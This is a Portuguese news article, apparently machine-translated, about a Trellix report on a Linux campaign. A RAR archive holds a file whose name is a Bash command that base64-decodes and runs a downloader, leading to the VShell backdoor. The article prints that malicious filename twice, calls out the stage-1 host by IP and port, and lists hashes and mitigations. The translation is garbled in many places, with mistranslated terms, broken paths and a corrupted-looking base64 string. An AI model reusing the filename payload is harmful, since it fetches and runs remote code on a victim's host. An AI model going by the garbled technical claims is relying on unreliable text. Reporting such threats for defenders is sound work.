O Trellix Advanced Research Center expôs uma cadeia de infecções que não arma nada mais que um nome de arquivo para comprometer os hosts do Linux.
Uma mensagem de spam disfarçada de pesquisa de produtos de beleza oferece uma pequena recompensa e carrega um arquivo rar, yy.rar. Quando descompactado, o arquivo solta um único arquivo cujo nome é um programa em miniatura: ziliao2.pdf {echo, kgn1cmwglwzzu0wglw0xodagahr0cdovlzq3ljk4lje5nc42mdo4mdg0l3nsd3x8 d2dldCatvDe4MCATCSBODHRWOI8VNDCUOTGUMTK0LJYWOJGWODQVC2X3KXXZACAG} _ {base64, -d} _bash
Os aparelhos exploram a sintaxe da “expansão do processo” do Bash. Qualquer loop não sedutor que enumera nomes de arquivos pense em f em *; Echo “$ f” ou uma avaliação em torno de um LS avalia cegamente o conteúdo dentro do aparelho, ecoando uma blob Base64, decodificando -o em tempo real e canalizando o texto simples a serem criticados.
Nenhum bit ou macro executável convencional é necessário; Um script de inventário de rotina ou coletor de log é suficiente para detonar a carga útil.
O script de estágio 1 decodificado chega a 47.98.194.60:8084 e silenciosamente pega um segundo download da festa.
A persistência é alcançada pela expansão do caminho e investigando diretórios graváveis, como /tmp, /usr /local /bin e /usr /libexec.
A CPU do host é a CPU do host (x86_64, i386, armv7l, aarch64) e puxa o carregador de elfo correspondente e chama -o com nohup em segundo plano para sobreviver às terminações da sessão.
Cada tentativa de cópia é embrulhada em redirecionamento para /dev /null, minimizando artefatos forenses no disco.
O carregador elfo do estágio-2, fortemente associado à família da luz de neve, constrói um HTTP que contém a etiqueta do host, o identificador de arquitetura e a porta de escuta e, em seguida, coleta uma bolha binária binária com xor.
Uma chave de byte única (0x99) é aplicada na memória, após a qual o programa executa a carga útil resultante via fexecve (), mantendo o disco de backdoor fora completamente. Para evitar infecções duplicadas, um arquivo marcador /tmp/log_de.log é verificado antes do lançamento.
Finalmente, o processo ‘argv é reescrito para imitar um tópico de trabalhador benigno do kernel [kworker/0:2] permitindo que ele se esconda à vista da vista durante o PS ou as principais inspeções.
Recursos de backdoor vshell
A carga útil descriptografada é o VSHELL, uma ferramenta de acesso remoto baseado em GO, preferido por várias equipes chinesas. O vshell fornece interativo conchas reversas.
Seu canal HTTP C2 é envolvido em rotinas XOR personalizadas e seus binários são compilados para várias arquiteturas, tornando a campanha igualmente perigosa para servidores em nuvem, aparelhos de IoT e estações de trabalho de desenvolvimento.
De acordo com o relatórioA campanha ignora três camadas de detecção tradicionais de uma só vez: os motores antivírus raramente examinam nomes de arquivos, os scanners estáticos perdem a cadeia de desosco e as ferramentas comportamentais não podem sinalizar a execução até que o nome do arquivo seja expandido.
Como muitos devOps, backup e monitoramento dos scripts iteram através de diretórios sem higienizar a entrada, a técnica arma a própria transparência e flexibilidade que tornam o Linux atraente.
A mitigação requer uma estritura de sinalização de entrada (por exemplo, printf ‘%q’ para nomes de arquivos), a remoção de avaliação de scripts de manutenção e monitoramento para saída anômala Solicitações HTTP de binários transitórios em /tmp ou /usr /local /bin. As equipes de segurança também devem procurar fios de kernel falsos e usos incomuns da Fexecve.
Indicadores de compromisso
Tipo de indicador | Valor |
---|---|
Arquivo SHA-256 | 5BDE055523D3B5B10F002C5D881BED882E60FA47393DFF41D155CAB8B72FC5F4 |
Nome de arquivo malicioso | ziliao2.pdf {echo, kgn1cmwglwzzu0wglw0xodagahr0cdovlzq3ljk4lje5nc42mdo4mdg0l3nsd3x8 d2dldCatvDe4MCATCSBODHRWOI8VNDCUOTGUMTK0LJYWOJGWODQVC2X3KXXZACAG} _ {base64, -d} _bash |
Script Stage 1 SHA-256 | 8EF56B48AC164482DDDF6A80F7367298D7B4D21BE3AADF0EEE1D82D63E3AC0C0A |
Etapa-2 Elf SHA-256 | 72702D6DDB671DC75E2EE6CAF15F98B752DF6125A43DAE71CDA35D305D989CF4 |
Etapa-2 Elf SHA-256 | 5712D8A629D607C86A9D094DDD24B4747B212D5A37B68AAD7F10A84DD601FAC751 |
Etapa-2 Elf SHA-256 | DD1B1E6D548B32A3CDE72418F1FB77353E421426766266641A9BB12447303E871 |
Etapa-2 Elf SHA-256 | 69E9EABFD18445352ECE9383BE55077CDB5BFB790A30A86758BC5249FF6B45BB |
VSHELL SHA-256 | 73000AB2F68ECF2764AF133D1B7B9F0312D5885A75BF4B7E51CD7B906B36E2D4 |
C2 IP | 47.98.194.60 |
Encontre esta notícia interessante! Siga -nosGoogle NewsAssim,LinkedIneXPara obter atualizações instantâneas!